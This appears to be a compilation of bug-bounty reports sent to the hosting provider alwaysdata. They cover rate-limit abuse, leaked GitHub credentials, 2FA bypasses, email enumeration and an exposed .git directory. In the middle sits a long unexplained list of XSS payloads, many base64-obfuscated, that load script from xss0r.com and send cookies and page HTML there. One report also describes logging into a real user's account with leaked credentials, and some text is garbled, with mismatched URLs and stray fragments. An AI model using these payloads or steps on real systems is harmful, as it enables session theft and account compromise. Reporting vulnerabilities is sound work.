Security vulnerabilities

Hi team,
iam an ethical hacker, web application penetration tester and bug bounty hunter.
I found a new Vulnerability So iam reporting it to you now.

Vulnerability: No rate limit on Submit tickets

Description:
I have identified a vulnerability in the organization's Submit tickets system, where the request to Submit tickets has no rate limit.

To reproduce this issue, follow the steps below:
Step 1: Go to the organization's website: https://admin.alwaysdata.com/support/add/ Step 2: fill the form by typing "1" in the "subject" section and type "2" in the Message" section and intercept the request using Burp Suite.
Step 3: Send this request to Intruder and make the payload on "1" that belongs to "subject" section then go to payloads and add numbers from 2 to 20.
Step 4: then start the attack.
Step 5: Observe that the 20 tickets send to support.
Please see my attached screenshots too.

This demonstrates that the vulnerability allows for mass tickets or tickets bombing to the organization, which is detrimental to business operations.

Impact:
1- Increased Load on Servers: Without a rate limit, there could be a significant increase in the number of requests to the server, which could lead to excessive load.
2- Vulnerability to Attacks: It could make the organization more vulnerable to attacks such as Denial of Service (DoS).
In a DoS attack, an attacker could flood the system with requests, consuming too much network capacity, storage, and memory.
3- Compromised User Experience: If the server is overwhelmed with requests, it could slow down the system for legitimate users.

I used an email address "haneenibra5566@gmail.com".com",
You can check the tickets that have sent from it.
I made the above scenario with this email address.

Solution:
To mitigate this vulnerability, it is recommended to implement additional security measures such as adding a CAPTCHA or implementing rate limiting on the invitation endpoint.
By adding these measures, the organization can prevent malicious users from exploiting the system and protect the business and its users from the negative consequences of mass mailing attacks.

I hope my report will keep you in safe

Description:

The website lacks proper email verification.During the user registration process,it only sending a greeting email upon registration. The absence of email verification could lead to create unverified accounts and host content with any email address, potentially poses a serious security risk.

Impact :

The absence of email verification poses a significant security risk, allowing the potential use of any email address for registration on a hosting site without proper authentication. This could lead to the creation of accounts under false identities, enabling malicious actors to host illegal content anonymously.

The free hosting service, which doesn't require valid details, may be exploited for unauthorized activities, emphasizing the need for robust email verification procedures to ensure account legitimacy and prevent abuse like.

Spam distribution

Phishing campaigns

Distribution of illegal or harmful content

Reputational damage to the platform

So, I am Reporting this issue to the platform's security team for addressing the vulnerability and enhancing overall security.

Description:

During a penetration testing process, I discovered a Self-XSS vulnerability on the page https://https://admin.alwaysdata.com/site/resolver/. This vulnerability has the potential to escalate into a Server-Side Request Forgery (SSRF) attack, allowing attackers to make unauthorized requests from the server. This poses risks such as data breaches and potential compromise of internal systems.

While the initial exploitation may require self-XSS, the underlying issue of unvalidated user input leading to SSRF is a critical vulnerability that must be addressed.

Steps To Reproduce:

Step 1 : Open BurpSuite.

Step 2 : Navigate to the following link in a web browser https://admin.alwaysdata.com/site/resolver/ Capture the traffic.Paste the payloads into the intercepted Request Body.

Payload 1:

{"addresses":["<script>alert(document.domain);</script>"]}

  (This payload triggers an alert displaying the value of document.domain.)

Payload 2:

{"addresses":["<img src=http://ox7dn3y4fsbqfkyzmmb5alv7i.odiss.eu/>"]}

  (This payload makes unauthorized requests from the server.)

Description:
A User's credential was leaked on github-dork.This will give potential insights to user's sensitive infos if any.

Steps to Reproduce:
1.github dork "admin.alwaysdata.com password"
2.visit this Repo:"https://github.com/AndryAurelian101/PHP-project/blob/b3b26287837a34ecb75da46e90ebf01c919d0c1e/www/db_connect.php"
3.you could see the credential are leaked.

I was able to login into the user's credential for verification.

Impact:
Information disclosure

Mitigation:
Redacting the credentials

Description: while Enumerating subdomains of Alwaysdata.com,
I Found a subdomain open hosting video conferencing for all.

Steps to reproduce: 1.visit the site :"https://jitsi.alwaysdata.com/"
2.create a video conferencing :"malicious.conferencing"
3.Now anyone can join the video call with the link provided by the attacker.

This could lead to potential damage to the Alwaysdata if the attacker intends to exploit this in a malicious way.
as this is open for any users on the web.

Impact: 1.Unauthorized Access:

Vulnerability: If the video conferencing system is not properly secured, it may be susceptible to unauthorized access.
Impact: Unauthorized individuals could join sensitive meetings, leading to the potential exposure of confidential information.

2.Phishing Attacks:
Vulnerability: Attackers may exploit the subdomain for phishing attacks, tricking users into providing sensitive information.
Impact: This could lead to the compromise of user credentials or the installation of malware on participants' devices.
3.Data Storage Security:

Vulnerability: Inadequate security measures for storing recorded video conference sessions.
Impact: Stored data may be at risk of unauthorized access, leading to the exposure of sensitive information.

POC:
https://drive.google.com/file/d/17NnRxFnzj7gZFsLXNEzt28b4jYjW7c-d/view?usp=sharing

Mitigation: To mitigate these risks, Alwaysdata should implement strong authentication, encrypt communication channels.

Good day Team,
This is Unauthorized Access to Admin Page via Exposed Credentials on GitHub

- admin.alwaysdata.com

Summary:
Sensitive credentials for an admin account were found exposed on a public GitHub repository. Using these credentials, an attacker can gain unauthorized access to the admin page of phpmyadmin.alwaysdata.com.

Description:
Credentials for an admin user were discovered using a Google dork on GitHub. The dork revealed an admin username and password that allowed access to the admin page of phpmyadmin.alwaysdata.com.

Steps to Reproduce:

1. Go to GitHub and use the search dork: "admin.alwaysdata.com" password.
2. Identify a public repository containing the admin username and password.
3. Navigate to https://phpmyadmin.alwaysdata.com/.
4. Use the discovered credentials to log in.
5. Observe that you have successfully logged in as an admin user.

Proof of Concept: https://drive.google.com/file/d/12dmKXf-6hwk-VZdozGl2FyvsbiVjDZA6/view?usp=sharing

Impact:
Unauthorized access to sensitive data and administrative functionalities.

## Security Report: On click Mark all notifications as read in [admin.alwaysdata.com]

Description

When a specific link is sent to another user and clicked, it causes all their notifications to be marked as read

### Steps to Reproduce

1. Log into your account on [admin.alwaysdata.com].
2. Send the link to the user. [https://admin.alwaysdata.com/message/toggle/]
3. The recipient clicks on the link.

All notifications for the user who clicks the link are marked as read.

##POC: https://admin.alwaysdata.com/support/77431/379620-bandicam%202024-09-20%2018-30-42-910.mp4

## Impact

Users may lose track of important notifications. In addition, it raises concerns about the security and integrity of user account management, as an attacker could exploit this vulnerability to manipulate notification statuses.

Title: Access Control Vulnerability in Two-Factor Authentication Management

Summary: This report highlights a security vulnerability related to user account management and two-factor authentication (2FA) within the system. The issue arises when a user invites another user to manage their account, creating a loophole that allows continued access even after 2FA is disabled.

—

Steps to Reproduce:

1. Account Creation:

1. A user creates a new account on[admin.alwaysdata.com].

2. Invite for Account Management:

1. The account owner invites another user to manage their account. The system requires that the invited user enables two-factor authentication on their account to gain management privileges.

3. Two-Factor Authentication Activation:

1. The invited user successfully activates two-factor authentication.

4. Management Access Granted:

1. The invited user can now manage the account of the account owner without restrictions.

5. Disable Two-Factor Authentication:

1. The invited user disables two-factor authentication on their account.

6. Continued Management Access:

1. Despite the deactivation of 2FA, the invited user retains the ability to manage the account of the account owner. This is contrary to the initial requirement that 2FA must be active for management access.

7. Session Management Issues:

1. If the invited user logs out and logs back in, they are prompted to re-enable 2FA to regain management access. However, this inconsistency presents a potential security risk during active sessions, Where the user can keep his session for up to two weeks

—##POC: https://admin.alwaysdata.com/support/81354/

Impact: This vulnerability allows an invited user to maintain management privileges over another user’s account, even after failing to comply with security requirements (2FA). If a malicious element manages to hijack the invited user's session, they can control the account owner’s settings without their consent, leading to potential data breaches

Hi Team i have found a reflective Xss in your url

http://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=8890

when i use this payload it triggers alert

https://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=%22{text%3a%3Cimg%2fsrc%3dx+onload%3dconfirm(1)%3E}%22

Please reach out to me , My email id is sabeesh.harinarayanan@gmail.com for POC as i am unable to attach here

Regards
Sabeesh

'"><script src=https://xss0r.com/c/sabeesh></script>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzMHIuY29tL2Mvc2FiZWVzaCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs6; onerror=eval(atob(this.id))>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://xss0r.com/c/sabeesh\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzMHIuY29tL2Mvc2FiZWVzaCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs6; autofocus>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzMHIuY29tL2Mvc2FiZWVzaCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs6;>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#120;&#115;&#115;&#48;&#114;&#46;&#99;&#111;&#109;&#47;&#99;&#47;&#115;&#97;&#98;&#101;&#101;&#115;&#104;&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "xss0r.com/c/sabeesh");a.send();</script>
<script>$.getScript("xss0r.com/c/sabeesh")</script>
var a=document.createElement("script");a.src="https://xss0r.com/c/sabeesh";document.body.appendChild(a);
'"></Title/</StYle/</TeXtarEa/</ScRipt/</NoScRiPt/</SeLeCt/</OpTiOn/</Svg/''"><svg/onload=javascript:eval(atob('dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzMHIuY29tL2Mvc2FiZWVzaCI7ZG9jdW1lbnQuYm9keS5hcHBlbmQoYSk7')) '"><img src=x onerror="eval(atob('dmFyIGEgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTthLnNyYyA9ICdodHRwczovL3hzczByLmNvbS9jL3NhYmVlc2gnO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7'))">
"><img src=&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#120;&#115;&#115;&#48;&#114;&#46;&#99;&#111;&#109;&#47;&#99;&#47;&#115;&#97;&#98;&#101;&#101;&#115;&#104; onerror=&#101;&#118;&#97;&#108;&#40;&#97;&#116;&#111;&#98;&#40;&#116;&#104;&#105;&#115;&#46;&#115;&#114;&#99;&#41;&#41;>
'"<img src="https://xss0r.com/c/sabeesh" onerror='this.src="https://xss0r.com/c/sabeesh"'>
'"<img src=x onerror='this.src="https://xss0r.com/c/sabeesh"'>
'"<img src=x onerror='fetch("https://xss0r.com/c/sabeesh",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})'>
'"<iframe src='javascript:window.location="https://xss0r.com/c/sabeesh"'></iframe>
'"<iframe srcdoc='<script>window.location="https://xss0r.com/c/sabeesh"</script>'></iframe>
'"<iframe srcdoc='<script>fetch("https://xss0r.com/c/sabeesh",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>'></iframe>
'"<object data='javascript:window.location="https://xss0r.com/c/sabeesh"'></object>
<input onfocus='fetch("https://xss0r.com/c/sabeesh",{method:"POST",mode:"no-cors"})' autofocus>
'"<script type="text/javascript" src="https://xss0r.com/c/sabeesh"></script>
'"<script type="module" src="https://xss0r.com/c/sabeesh"></script>
'"<script nomodule src="https://xss0r.com/c/sabeesh"></script>
javascript:window.location="https://xss0r.com/c/sabeesh"
javascript:fetch("https://xss0r.com/c/sabeesh")
–></tiTle></stYle></texTarea></scrIpt>"'><scrIpt src="https://xss0r.com/c/sabeesh"></scrIpt>
'"<img src="https://xss0r.com/c/sabeesh" onerror="this.src='https://xss0r.com/c/sabeesh'">
'"<svg/onload="window.location.href='https://xss0r.com/c/sabeesh'">
'"<audio src onerror='fetch("https://xss0r.com/c/sabeesh",{method:"POST",mode:"no-cors"})'>
'"<script>new Image().src="https://xss0r.com/c/sabeesh"</script>
'"<form action="https://xss0r.com/c/sabeesh" method="POST"><input name="data" value=""></form><script>document.forms[0].submit();</script>
'"<iframe src="javascript:fetch('https://xss0r.com/c/sabeesh')"></iframe>
'"<link rel="stylesheet" href="https://xss0r.com/c/sabeesh" onerror='fetch("https://xss0r.com/c/sabeesh")'>
'"<meta http-equiv="refresh" content="0;url=https://xss0r.com/c/sabeesh">
'"<object data="https://xss0r.com/c/sabeesh" onerror='this.data="https://xss0r.com/c/sabeesh"'></object>
javascript:fetch("https://xss0r.com/c/sabeesh")
'"<svg/onload="fetch('https://xss0r.com/c/sabeesh'">
{constructor.constructor('fetch("https://xss0r.com/c/sabeesh"')()}
'"<img src=x onerror="fetch('https://xss0r.com/c/sabeesh')">
'"></script></title></textarea><script src=https://xss0r.com/c/sabeesh></script>
'"<svg/onload='var a="fetch";var b="https://xss0r.com/c/sabeesh"; setTimeout(a+"(b)",1000)'>
'"<iframe src="javascript:setTimeout('fetch(\"https://xss0r.com/c/sabeesh\")', 1000)"></iframe>
'"<form id='xss'><button form='xss' formaction='javascript:fetch("https://xss0r.com/c/sabeesh")'>Click Me</button></form>
'/*'/*`/*–></noscript></title></textarea></style></template></noembed></script>"'><scrIpt src="https://xss0r.com/c/sabeesh"></scrIpt>
'"><img src=x onerror=setTimeout(String.fromCharCode(102,101,116,99,104)+'("https://xss0r.com//sabeesh")', 0)>
'"><script>'/*'/*`/*–><svg onload=fetch("https://xss0r.com/c/sabeesh")></script>
'"?><svg/onload="fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)">
<img src=x onerror="setTimeout(function(){fetch('https://xss0r.com/c/sabeesh?data='+document.cookie)},10)">
<input autofocus onfocus="fetch('https://xss0r.com/c/sabeesh?token='+document.cookie)">
<iframe src="javascript:void(0)" onload="fetch('https://xss0r.com/c/sabeesh?url='+location.href)"><!–" –>
'"></title></textarea></script></style></noscript><script src=https://xss0r.com/c/sabeesh></script>
ibrahim'"<script src=https://xss0r.com/c/sabeesh></script>
ibro%27%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%3E%3C%2Fscript%3E
–></tiTle></stYle></texTarea></scrIpt>"'><scrIpt src=https://xss0r.com/c/sabeesh></scrIpt>
/*'/*`/*–></noscript></title></textarea></style></template></noembed></script>"'><scrIpt src="https://xss0r.com/c/sabeesh"></scrIpt>
-'"><Svg Src=xss0r.com/c/sabeesh/s OnLoad=import(this.getAttribute('src')+0)>
email%5D=zer0_sec+1%22%3E%3Cscript+src%3D%22https%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%22%3E%3C%2Fscript%3E%40ibro1337%40gmail.com
<input onmouseover="fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)">
'"><Svg Src=xss0r.com/c/sabeesh/s OnLoad=import(this.getAttribute('src')+0)>
'"><Img Src=xss0r.com/c/sabeesh/x Onload=import(src+0)>
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:https://xss0r.com/c/sabeesh\00?1=1290/.source))>
\"><input autofocus nope="%26quot;x%26quot;" onfocus="frames.location='https://xss0r.com/c/sabeesh?c='+Reflect.get(document,'coo'+'kie')">
\"></script><img src="x" onerror="with(document)body.appendChild(createElement('script')).src='https://xss0r.com/c/sabeesh'">
<p><img src="https://xss0r.com/c/sabeesh" border="0" />–&gt;</p>
'"></title></textarea></script></style></noscript><script src=https://xss0r.com/c/sabeesh></script>
<script>$.getScript("https://xss0r.com/c/sabeesh")</script>
‘;"/></textarea></script><script src=xss0r.com/c/sabeesh>
zer0_sec+1%22%3E%3Cscript+src%3D%22https%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%22%3E%3C%2Fscript%3E%40ibro1337%40gmail.com
zer0_sec 1"><script src="https://xss0r.com/c/sabeesh"></script>@ibro1337@gmail.com ibro1337%40gmail.com%22%3E%3Cscript%20src%3D%22https%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%22%3E%3C%2Fscript%3E
ibro1337@gmail.com"><script src="https://xss0r.com/c/sabeesh"></script>
{globalThis.constructor("fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)")()}
ibro1337@gmail.com<!–" –><script src=https://xss0r.com/c/sabeesh></script>
ibro1337%40gmail.com%22%3E%3Cscript%20src%3D%22https%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%22%3E%3C%2Fscript%3E
ibro1337@gmail.com"><svg onload="fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)"></svg>
<iframe src="https://xss0r.com" onload="fetch('https://xss0r.com/c/sabeesh?cookie=' + document.cookie)"></iframe>
</script><Iframe SrcDoc="><script src=https://xss0r.com/c/sabeesh></script>">
%3C%2Fscript%3E%3CIframe%20SrcDoc%3D%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%3E%3C%2Fscript%3E%22%3E
%253C%252Fscript%253E%253CIframe%2520SrcDoc%253D%2522%253E%253Cscript%2520src%253Dhttps%253A%252F%252Fxss0r.com%252Fc%252Fsabeesh%253E%253C%252Fscript%253E%2522%253E
–></tiTle></stYle></texTarea></scrIpt>"'><scrIpt src="https://xss0r.com/c/sabeesh"></scrIpt>
–%3E%3C%2FtiTle%3E%3C%2FstYle%3E%3C%2FtexTarea%3E%3C%2FscrIpt%3E%22%2F%2F%27%2F%2F%3E%3CscrIpt%20src%3D%22https%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%22%3E%3C%2Fscript%3E
–%253E%253C%252FtiTle%253E%253C%252FstYle%253E%253C%252FtexTarea%253E%253C%252FscrIpt%253E%2522%252F%252F%2527%252F%252F%253E%253CscrIpt%2520src%253D%2522https%253A%252F%252Fxss0r.com%252Fc%252Fsabeesh%2522%253E%253C%252Fscript%253E
javascript:%27%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%3E%3C%2Fscript%3E
'"><script src=https://xss0r.com/c/sabeesh></script><img src=x onerror=fetch('https://xss0r.com/c/sabeesh?c='+document.cookie)>
javascript:%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%3E%3C%2Fscript%3E
javascript:%27%22%3E%3Csvg%20onmouseover%3D%22fetch('https://xss0r.com/c/sabeesh?data='+document.cookie)%22%3E%3C%2Fsvg%3E
javascript:/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/–>&lt;svg/onload=/*<html/*/onmouseover=fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)>
javascript:</script></textarea></style></noscript></noembed></script></template>&lt;svg/onload=/*fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)/*–><html */ onmouseover=alert()//>

Bug Report: Vulnerability in User Addition Feature Leading to Email Blockage Exploit

Subject: Misconfiguration in User Addition Feature - Enables Permanent Blockage of Employee/User Emails

To:
Security Team
alwaysdata

Description:
The "Add a User" feature in your application has a critical misconfiguration that allows attackers to exploit email handling mechanisms. The vulnerability permits any email address, including sensitive ones like victim@alwaysdata.com or employee@alwaysdata.com, to be registered by an attacker under their account. This issue occurs irrespective of whether the victim is an actual user or employee of alwaysdata.
Key Problem:
Once an attacker registers email addresses to their account, the application erroneously considers these emails as "already in use." Consequently, legitimate users or employees are unable to:
• Register with their own email addresses.
• Recover passwords using the "Forgot Password" feature.
This creates a significant denial of service for legitimate users, especially for employee emails or those critical to operations.

Steps to Reproduce:
1. Login to the Application:
o Attacker logs into their account on alwaysdata.
2. Access the "Add a User" Feature:
o Navigate to the "Add a User" section.
3. Add Any Email Address:
o Enter any target email (e.g., victim@alwaysdata.com, employee@alwaysdata.com, or database_admin@alwaysdata.com) and add it as a user.
4. Observe the Impact:
o The entered email is stored in the database, associating it with the attacker’s account.
o Legitimate users or employees attempting to register with their email or recover their account using "Forgot Password" are blocked as their emails are flagged as already registered.

Business Impact:
1. Disruption of Operations:
Employees using critical emails (e.g., employee@alwaysdata.com, support@alwaysdata.com) are prevented from accessing the platform. This can halt workflows and damage operational continuity.
2. Customer Impact:
Legitimate customers with hijacked email registrations are blocked from using the platform, leading to frustration and loss of trust.
3. Potential Abuse:
o Attacker could pre-register a large list of potential or known email addresses (e.g., 100+ victims).
o Targeted denial of service campaigns against specific users or employees.
4. Reputational Damage:
Affected users may view alwaysdata as insecure and prone to misuse.

Severity:
Moderate to High

Remediation Steps:
1. Email Validation:
Restrict the registration of emails ending with @alwaysdata.com to prevent abuse of employee addresses.
2. Duplicate Email Handling:
Implement a verification mechanism to check if an email is legitimately registered to an account and ensure users can still register or recover their accounts.
3. Audit "Add a User" Logic:
Validate and sanitize inputs to avoid unauthorized addition of unrelated or sensitive emails.
4. Email Ownership Verification:
Mandate email verification for all newly added users before finalizing their association with an account.

Video POC:
A detailed POC has been attached showcasing the reproduction of this bug and its consequences.
https://drive.google.com/file/d/1TBi7njRCCsqkHhAEri7viUmyGot1Pyf5/view?usp=sharing

https://example.com

Subject: Misconfiguration in 2FA Implementation Allows Pre-Complete ATO

To:
Security Team
alwaysdata

Description:
The lack of email verification before enabling Two-Factor Authentication (2FA) introduces a critical vulnerability that can facilitate pre-complete Account Takeover (ATO). An attacker can register email addresses resembling critical system accounts (e.g., administrator@alwaysdata.com or support@alwaysdata.com) without any validation.
This misconfiguration allows the attacker to appear as legitimate users or administrators by exploiting the following gaps:
1. Email Address Control:
The attacker registers administrator@alwaysdata.com (since admin@alwaysdata.com is already in use) or similar critical addresses such as support@alwaysdata.com. This bypass occurs because the application does not verify email ownership before enabling 2FA.
2. Pre-Complete ATO via 2FA:
Once the attacker controls the fake email, they enable 2FA. This results in the following:
- The email becomes "locked" for the attacker's use.
- Real administrators or support users cannot register or regain control of these emails.
- Critical accounts, if assumed to be associated with internal roles, are exploited for phishing or denial of service.
This oversight compromises account security and can lead to severe operational and reputational risks for alwaysdata.

Steps to Reproduce:
1. Register as a New User:
- Create a new account with an email resembling a sensitive system role (e.g., administrator@alwaysdata.com or support@alwaysdata.com).
2. Set Up 2FA on the Account:
- Enable Two-Factor Authentication without any email ownership verification.
3. Observe the Impact:
- The attacker now controls a seemingly legitimate account.
- Real users or employees attempting to register or recover accounts with these emails are blocked.
4. Potential Exploit:
- Use the compromised "fake admin" email to trick other users or employees.
- Execute phishing attacks or leverage the fake email for social engineering attempts.

Business Impact:
1. Operational Risk:
- Legitimate users or employees are unable to access critical accounts (e.g., admin@alwaysdata.com or support@alwaysdata.com).
- This could lead to service disruptions and hinder internal workflows.
2. Security Risks:
- Attackers can impersonate sensitive roles and deceive users or employees.
- Creates opportunities for phishing, fraud, and social engineering attacks.
3. Reputational Damage:
- Users and employees may lose trust in alwaysdata due to perceived weak account protection mechanisms.
4. Pre-Complete ATO:
- Attacker gains control of accounts with system-level trust (e.g., admin-like emails) without the ability of real users to regain access.

Severity:
High

Remediation Steps:
1. Mandate Email Verification:
Require all email addresses to be verified during registration and before enabling 2FA.
2. Restrict Critical Email Formats:
Disallow registrations with email addresses resembling sensitive roles (e.g., admin, administrator, support).
3. Enforce Ownership Validation:
Implement strict validation to ensure that users can only enable 2FA on accounts they genuinely own.
4. Audit Existing Accounts:
Identify and rectify any unverified accounts with potentially sensitive email addresses.

Video POC:
A detailed demonstration of the exploit steps is attached to this report to illustrate the issue clearly.
https://drive.google.com/file/d/17DNkoihfOW7jyMoY_eWMGNiigNY4Zmo7/view?usp=sharing

Email Enumeration:

Hello Team, I hope you are doing well. Well, researching on your domain, i found email enumeration in your domain.

Steps:

1.log in admin.alwaysdata.com account go to Profile.
2.choose change my email
3.enter your pass
4.enter any email you want to check
5.if the email isn't registered a message appears saying(the email is changed.)
6.if it is registered the message appearing is( There is already a profile with this email.)

BY automating the process you can easily enumerate users emails . what is the impact : 1.Mass password reset requests to registered users(spam) 2.imagine a new company like alwysdata want to advertise it will easily enumerate emails of alwaysdata and send the customers emails to convince them to join their company and leave circle this may cause you to loose some of your customers(targeted advertising through alwaysdata database) . there are other impact but those are most severe.

Here is the fix:
when a user try to assign an email that is already registered to your accounts tell him that (An error has occured)or(we have sent a verification email to your email address)or anything not revealing he is registered to you .
Here is the POC:
i have carried the attack on sample of 8845 emails to avoid server overload
the result is by using burpsuite i can bruteforce the change email feature and enumerate users by the status in intruder attack:
200—>Not registered and can be added
500—>registered and error message
400—> this is invalid email because for example it doesn't have @ sign in it

Thank You,
Waleed Anwar

Hi Team,

I found a rate limit bypass in reset password endpoint.

If we send the following POST:

POST /password/lost/ HTTP/2
Host: admin.alwaysdata.com
Cookie: csrftoken=xxxxxxxx………………; django_language=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://admin.alwaysdata.com/password/lost/ Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Origin: https://admin.alwaysdata.com Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrfmiddlewaretoken=xxxxxxxxxxxxxxx…………………..&email=example%40gmail.com

Now send the request around ~50 times and it'll hit "Too Many Requests". Now simply add %00 on the end of the email and resend even more password reset emails.
&email=example%40gmail.com%00 - and keep adding %00 everytime you are rate limited. After a while you can go back to just %00 as it resets after so long.

No real impact with just mass emailing someone a reset password link, but I thought it was worth reporting because the rate limiting bypass might exist in other areas (with the use of the null byte %00)

Thank You,

Waleed Anwar

producing steps:
By using google dorks and write
site:alwaysdata.com intitle:index.of
it will show 2 sites
https://files.alwaysdata.com/ https://files.alwaysdata.com/migrations/software-2020/ the 2 files give me 404 forbidden

poc
searching for files.alwaysdata.com in waybackmachine
i can access now the pages without forbidden message
it contains software-2017 and software 2020
https://web.archive.org/web/20241007181407/https://files.alwaysdata.com/migrations/ it is an index page , appears software files that can be downloaded

Hello support teams,
I hope this email finds you well. I am Devansh . I am a security researcher and I found a vulnerability in your website.

bug name : Lack of password confirmation on account deletion

Description: the user account can be deleted without confirming user password or re authentication.
The removal of an account is one of the sensitive parts of any application that needs to be protected, therefore removing an account should validate the authenticity of the legitimate user.

steps to reproduce:

1. Go to account settings and click on delete account.

2. There will be a next page where I click on delete my account now option.

3. You will see the message of account has been deleted and get logged out

Remediation:
System must confirm authentic user before performing such task. A link can be sent to the user email id that can be used for delete operation. Otherwise user password should be provided to the application to confirm the entity identity.

It seems to be of very low impact,but consider a situation when a user forgets to logout from his account or someone gets access to his phone and deletes the account. This situation is more severe than account takeover as there is no way to get an account again. All the save information and data including previous record, card information etc can be deleted.

video poc is attached

Thanks and regards
Devansh

https://

Hello support teams,

I hope this email finds you well. I am Devansh.I am a security researcher and I am writing to bring to your attention a security vulnerability that I have discovered on your website.

Report of bug is as follows:

Vulnerability name: .git file exposed

Website : https://security.alwaysdata.com/.git/config

Overview of the Vulnerability

The danger occurs when the application leaves the “. git” directory, which is in the system root, exposed. By carelessness, an application that uses Git for versioning can expose the “. git” directory.

Steps to Reproduce

1. open this website in the browser https://cdn.anscommerce.com/.git/config

2. you can see the git file is open

3 .by the dotgit extension you can download the git file

It can be exploited more but may cause harm to your website

Impact of the vulnerability

git folder is required to log every commit history and every other information required for your remote repository, version control, commits etc. These things are saved in different folders which have different meanings. Once the folder is created, open it and see the

References :

https://medium.com/stolabs/git-exposed-how-to-identify-and-exploit-62df3c165c37

https://www.acunetix.com/vulnerabilities/web/git-detected/

Please consider this as an urgent matter and prioritize the resolution of this vulnerability . if you require any additional information or assistance. Do let me know

Thank you for your attention to this matter, and I look forward to hearing from you soon.

Regards
Devansh

*Title:* Two-Factor Authentication Bypass via Support Ticket Creation in [admin.alwaysdata.com]

*Summary:*
A critical security vulnerability has been identified in the [admin.alwaysdata.com]'s account management system where a user with administrative privileges but mandated to use two-factor authentication (2FA) can bypass this requirement by initiating a support ticket under the name of the primary account holder without triggering 2FA.

*Description:*
This vulnerability allows an added user, who is supposed to be restricted by 2FA, to perform actions appearing as the primary account holder by submitting support tickets. This circumvents the security protocol intended to protect sensitive account operations via 2FA, potentially leading to unauthorized actions without the account holder's consent or knowledge.

*Steps to Reproduce:*
1. Create two user accounts, Account A (primary) and Account B.
2. From Account A, add Account B as another user with full administrative privileges but enforce 2FA on actions.
3. Log into Account B.
4. Navigate to the support section and initiate a support ticket, selecting Account A as the affected account.
5. Submit the ticket without being prompted for 2FA verification.

I sent a proof of concept : https://admin.alwaysdata.com/support/77431/367474-VID-20240423-WA0000.mp4

*Impact:*
The primary account holder's security is compromised as the added user can perform sensitive operations under their guise without completing the necessary 2FA checks. This vulnerability may lead to unauthorized access and control over the primary account's sensitive functions and data.

XSS Vulnerability in [admin.alwaysdata.com] Support Ticket System

Vulnerability Report
Greeting: Dear Team

I'm writing to report a critical Reflected Cross-Site Scripting (XSS) vulnerability discovered in your [admin.alwaysdata.com] application. This vulnerability allows attackers to inject malicious JavaScript into the application, potentially compromising user accounts and sensitive data.

